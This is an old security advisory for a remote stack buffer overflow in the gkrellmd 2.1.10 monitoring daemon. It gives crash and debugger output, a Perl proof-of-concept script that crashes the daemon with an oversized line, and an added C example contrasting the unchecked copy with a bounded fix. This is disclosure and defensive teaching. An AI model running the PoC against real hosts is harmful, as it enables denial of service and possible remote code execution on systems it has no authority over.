Gkrellmd 2.1.10 remote exploit (buffer overflow)

date: 22-06-2003
author: dodo [dodo@darkwired.ath.cx]
author-url: https://darkwired.ath.cx/

- Description:

Gkrellm is a GTK system monitoring utility; the latest version ships with a daemon, gkrellmd. It is a great piece of software, but the daemon needs more careful code.

gkrellm/gkrellmd: http://www.gkrellm.net/

- Exploitation:

When a client sends data to gkrellmd, the daemon stores it in a fixed-size buffer of 128 bytes, but never checks the received length against that size. A client line longer than 128 bytes therefore overwrites whatever follows the buffer on the stack. This can crash the daemon and, with a crafted payload, lead to remote code execution with the privileges gkrellmd runs under.

- Details:

verbose gkrellmd output:

cyride-bash# gkrellmd -P 661 -V
update_HZ=3
connect string from client: gkrellm 2.1.10
gkrellmd accepted client: dwop.darkwired.da.ru:43755
received 141 bytes: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)

debugger output (eip):

cyride-bash# gdb gkrellmd gkrellmd.core
(gdb) info reg eip
eip            0x41414141       0x41414141

eip holds 0x41414141, i.e. the 'A' bytes from the client overwrote the saved return address, so the sender controls where the daemon returns to. 141 bytes is only 13 past the 128-byte buffer, which is enough to cover a saved frame pointer and return address on an x86 stack frame.

- Proof of concept:

gkrellmcrash.pl:

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

#
# proof of concept code
# tested: gkrellmd 2.1.10
#

if (!$ARGV[0] || !$ARGV[1]) {
    print "usage: ./gkrellmcrash.pl <host> <port>\n";
    exit(-1);
}

my $host = $ARGV[0];
my $port = $ARGV[1];

# 141 bytes of 'A': 13 more than the daemon's 128-byte buffer holds
my $exploitstring = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

my $socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
);
die "unable to connect to $host:$port ($!)\n" unless $socket;

print $socket "gkrellm 2.1.10\n";   # tell the daemon which client we are
sleep(1);
print $socket $exploitstring;        # oversized line, overflows the buffer
close($socket);

- Vendor Response:

vendor contacted on 22-06-2003
http://www.gkrellm.net/
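The following is an added example, not gkrellmd's source and not part of the original advisory: a constructed model of the bug described under Exploitation, the unchecked copy of a client line into a 128-byte buffer, next to the bounded version a fix would use. The function names, the copy loop and the probe builder are assumptions; only the 128-byte buffer size and the 141-byte probe come from the advisory. The vulnerable reader is included for comparison and is never called.

```c
#include <stdio.h>
#include <string.h>

/* Buffer size stated in the advisory. Everything else in this file is an
 * assumed model of the bug, not gkrellmd's code. */
#define GKRELLMD_BUFSIZE 128

/* How many bytes of a client line land past the end of the buffer.
 * The advisory's 141-byte probe gives 13. */
size_t overflow_bytes(size_t line_len)
{
    return line_len > GKRELLMD_BUFSIZE ? line_len - GKRELLMD_BUFSIZE : 0;
}

/* Vulnerable shape (never called here): copies up to the newline with no
 * check against the buffer size. A 141-byte line without a newline writes
 * 13 bytes past buf, over the saved frame pointer and return address on an
 * x86 frame, which is how eip ends up as 0x41414141. */
void read_line_vulnerable(const char *data, size_t len)
{
    char buf[GKRELLMD_BUFSIZE];
    size_t i = 0;
    while (i < len && data[i] != '\n') {
        buf[i] = data[i];          /* no bound on i */
        i++;
    }
    buf[i] = '\0';
    printf("client said: %s\n", buf);
}

/* Hardened shape: stop before the buffer is full and report the oversize
 * line so the caller can drop the client. Returns the number of bytes
 * stored (without the newline), or -1 if the line does not fit. */
int read_line_fixed(const char *data, size_t len, char *buf, size_t bufsz)
{
    size_t i = 0;
    while (i < len && data[i] != '\n') {
        if (i + 1 >= bufsz)        /* keep one byte for the terminator */
            return -1;
        buf[i] = data[i];
        i++;
    }
    buf[i] = '\0';
    return (int)i;
}

/* Builds the PoC payload: n bytes of 'A' with no newline (constructed). */
void make_probe(char *dst, size_t n)
{
    memset(dst, 'A', n);
}

/* Feeds an n-byte probe to the fixed reader; -2 if n exceeds the local scratch. */
int fixed_reader_on_probe(size_t n)
{
    char probe[256];
    char buf[GKRELLMD_BUFSIZE];
    if (n > sizeof probe)
        return -2;
    make_probe(probe, n);
    return read_line_fixed(probe, n, buf, sizeof buf);
}

/* The client handshake line from the advisory, through the fixed reader. */
int fixed_reader_on_handshake(void)
{
    char buf[GKRELLMD_BUFSIZE];
    return read_line_fixed("gkrellm 2.1.10\n", 15, buf, sizeof buf);
}

int main(void)
{
    printf("141-byte line: %zu bytes past the buffer\n", overflow_bytes(141));
    printf("fixed reader, 141-byte probe: %d\n", fixed_reader_on_probe(141));
    printf("fixed reader, 127-byte probe: %d\n", fixed_reader_on_probe(127));
    printf("fixed reader, handshake: %d\n", fixed_reader_on_handshake());
    return 0;
}
```

The fixed reader rejects any line of 128 bytes or more, since a 128-byte line plus its terminator needs 129 bytes; the handshake line "gkrellm 2.1.10" still passes. A real fix would also close the connection on the -1 return rather than keep reading from a client that has already sent an oversize line.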